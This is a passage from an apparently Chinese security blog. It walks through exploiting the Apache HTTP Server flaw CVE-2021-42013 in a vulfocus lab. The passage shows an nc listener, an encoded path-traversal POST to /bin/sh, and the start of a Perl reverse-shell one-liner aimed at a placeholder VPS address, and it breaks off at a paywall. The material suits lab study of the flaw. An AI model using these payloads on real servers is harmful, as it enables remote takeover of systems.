声明
严禁读者利用本文介绍知识点对网站进行非法操作 , 本文仅用于技术交流和学习 , 如果您利用文章中介绍的知识对他人造成损失 , 后果由您自行承担 , 如果您不能同意该约定 , 请您务必不要阅读该文章 , 感谢您的配合 !
远程代码执行 CVE-2021-42013
描述
Apache HTTP Server是美国阿帕奇(Apache)基金会的一款开源网页服务器。该服务器具有快速、可靠且可通过简单的API进行扩充的特点,发现 Apache HTTP Server 2.4.50 中针对 CVE-2021-41773 的修复不够充分。攻击者可以使用路径遍历攻击将 URL 映射到由类似别名的指令配置的目录之外的文件。如果这些目录之外的文件不受通常的默认配置“要求全部拒绝”的保护,则这些请求可能会成功。如果还为这些别名路径启用了 CGI 脚本,则这可能允许远程代码执行。此问题仅影响 Apache 2.4.49 和 Apache 2.4.50,而不影响更早版本。
影响范围
Apache HTTP Server 2.4.49、2.4.50
开启靶场
在vulfocus中开启靶场
访问靶场
演示
生成反弹shell命令
https://forum.ywhack.com/shell.php
或者
https://forum.ywhack.com/reverse-shell/
vps开启监听
nc -lvvp 9999
访问靶场并burp开启抓包,再改成post请求
POST /cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh
echo;perl -e 'use Socket;$i="vps的ip地址";$p=9999;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connec
最低0.47元/天 解锁文章
扫一扫
2513
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
